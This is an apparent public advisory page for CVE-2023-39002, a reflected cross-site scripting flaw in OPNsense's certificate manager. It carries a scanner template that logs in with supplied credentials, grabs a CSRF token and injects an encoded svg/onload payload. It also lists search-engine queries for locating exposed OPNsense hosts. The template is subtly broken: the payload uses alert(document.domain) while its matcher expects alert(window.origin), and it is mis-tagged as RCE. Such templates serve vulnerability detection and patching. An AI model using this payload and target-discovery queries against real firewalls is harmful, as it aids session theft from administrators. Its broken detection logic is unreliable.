CVE-2023-39002: OPNsense - Cross-Site Scripting

2025-08-01 OPNsense PoC Public

Description

A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

PoC

id: CVE-2023-39002

info:
  name: OPNsense - Cross-Site Scripting
  author: Herry
  severity: medium
  description: |
    A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
  impact: |
    Authenticated attackers can inject malicious JavaScript through the act parameter in system_certmanager.php to steal OPNsense administrator session cookies and gain control of the firewall configuration.
  remediation: |
    Update OPNsense to version 23.7 or later that properly sanitizes the act parameter in system_certmanager.php and encodes output to prevent XSS attacks.
  reference:
    - https://logicaltrust.net/blog/2023/08/opnsense.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39002
    - https://github.com/opnsense/core/commit/a4f6a8f8d604271f81984cfcbba0471af58e34dc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-39002
    cwe-id: CWE-79
    epss-score: 0.01202
    epss-percentile: 0.66647
    cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: opnsense
    product: opnsense
    shodan-query:
      - title:"OPNsense"
      - http.title:"opnsense"
    fofa-query: title="opnsense"
    google-query: intitle:"opnsense"
  tags: cve2023,cve,opnsense,xss,authenticated,rce,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1

      - |
        GET /system_certmanager.php?act=%22%3E%3Csvg/onload=alert(document.domain)%3E&id=0 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - 'value=""><svg/onload=alert(window.origin)> "/>'

      - type: word
        part: header_3
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: para
        part: body
        group: 1
        regex:
          - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
        internal: true

      - type: regex
        name: value
        part: body
        group: 2
        regex:
          - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
        internal: true
# digest: 4a0a00473045022100879fa463d8fe1adaed47835a117ad2e12231ae2f4dfbfd4fe95f5bc31f656f4302202957c3af9ef8300d1d703b7be0578e6a22313d22fcdc66a9b7c7f15d07b939f0:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities